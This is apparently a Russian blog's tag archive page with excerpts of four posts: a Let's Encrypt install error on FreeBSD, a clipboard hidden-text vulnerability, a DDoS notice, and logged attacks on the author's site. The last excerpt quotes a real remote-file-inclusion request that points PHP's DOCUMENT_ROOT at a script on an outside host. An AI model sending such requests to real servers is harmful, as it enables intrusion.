Архив метки: web

PythonDialogBug на FreeBSD в Letsencrypt

Многие наверняка слышали об инициативе по выдаче бесплатных сертификатов Let’s Encrypt (которую скоро переименуют и она будет жить на EFF). Выдаются они всего на 3 месяца, но обновление можно автоматизировать. Я тоже решил попробовать этого зверя, установил из портов и… обломался. Получил ошибку PythonDialogBug (полный лог см. ниже). Быстро найти решение не удалось, поэтому я… Читать далее »

WYSINWYC — What you see is not what you copy

В сети появилось несколько сообщений об интересной уязвимости: при копировании текста с веб-сайта можно скопировать скрытый текст, который может выполнить что угодно. При вставке текста вы его можете увидеть, но не сможете отменить его исполнение. Примечательно, что при выделении строки тройным кликом, строка со скрытым текстом не выделяется по-нормальному, выделяется только кусок строки. В общем,… Читать далее »

Добро побеждает зло

Вот так, други мои, делаешь людям добро, а получаешь DDoS-атаку на свою задницу: Dear FreeDns.ws users! Unfortunately, our servers has been affected by a DDoS attack. We are working on resultion of this problem in cooperation with our providers. Normal operation of our service will be restored in 24 hours. Thank you for understanding, FreeDns.ws… Читать далее »

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP. /var/log/messages: Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’) Пример запроса (из лога апача): 211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt???… Читать далее »